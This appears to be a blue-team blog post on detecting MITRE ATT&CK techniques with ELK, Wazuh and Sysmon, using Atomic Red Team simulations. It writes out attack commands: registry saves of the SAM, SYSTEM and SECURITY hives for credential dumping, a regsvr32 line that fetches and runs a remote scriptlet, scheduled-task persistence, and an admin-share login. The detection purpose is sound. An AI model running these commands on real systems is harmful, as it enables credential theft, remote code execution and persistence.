Threat Hunting with ELK + Wazuh
With Sysmon configured on endpoints, ELK + Wazuh stack will facilitate greatly in performing Threat Hunting operations.
We know that threat landscape is increasing exponentially day by day and perpetrators are employing sophisticated techniques to fly always under radar. So, it is highly important for SOC teams to accelerate the detection capabilities to identify the well-known TTPs at the first place.
This post will highlight, how Detection capabilities can be leveraged with help of Blue-team’s arsenal Sysmon. The thumb rule of Blue Team is — The More Quality Logs the organization stores, easier the detections.
To get started, below open source tools are used:
- ELK
- Wazuh
- Sysmon — (config file: sysmon-modular)
- Atomic Red Team (ART)
Background: Wazuh is Opensource HIDS and forked project of OSSEC which has capability to act of HIDS, Detect Rootkits, Endpoint logs shippers to SIEM for enhanced Security Analytics. It has additional fantastic features not limited to File Integrity Monitoring, Vulnerability Detection, Compliance solutions etc.,
Atomic Red Team (ART) comes with multiple MITRE Techniques testing scenarios. The coverage area by ART can be found below-
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md
Here, below Techniques are tested for simulation purpose and same can be considered to write correlation logic rules in SIEM –
- T1003 — Credential Dumping
- T1037 — Logon Scripts && T1053 Scheduled Task
- T1018 — Remote Host Discovery && T1077 — Windows Admin Shares
- T1117 — Regsvr32
OKAY!! Let us go practical and the see how the results will appear for these MITRE Techniques ʕ•ᴥ•ʔ
- T1003 — Credential Dumping
The credentials dumping is process of obtaining the username, password information (clear text/hashes), tickets and post dumping will leverage the attacker to perform chain of activities to fulfill their objectives.
There are several areas where credentials will get stored or can be retrieved from the Windows OS. Some of the them are -
- SAM
- LSA Secrets
- Lsass.exe process memory
- Service Principle Names (SPN)
- Cached Credentials
- Registry files
To fetch this credential information, there are confirmed evidences where adversaries had used some of below tools in the past in the series of compromising environment.
- Mimikatz
- gsecdump
- Secretdump
- Windows Credential editor
- Metasploit modules
- Powersploit
- Empire
Let us see how SAM dumping looks like in SIEM Incidents —
Commands used on victim machine
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
The alerts received on ELK —
2. T1117 — Regsvr32
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking.
Command used on victim machine –
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
The alerts received on ELK —
3. T1037 — Logon Scripts && T1053 Scheduled Task
Commands used on victim machine –
schtasks /create /tn “T1037_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe”schtasks /create /tn “T1037_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe”
The alerts received on ELK —
4. T1018 — Remote Host Discovery && T1077 — Windows Admin Shares
Command used on victim machine –
cmd.exe /c “net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator”
The alerts received on ELK —
Big shout out to Olaf Hartong (@olafhartong), Atomic Red Team (ART) to use their projects for learning purpose.
Happy Blue Teaming!
Reference:
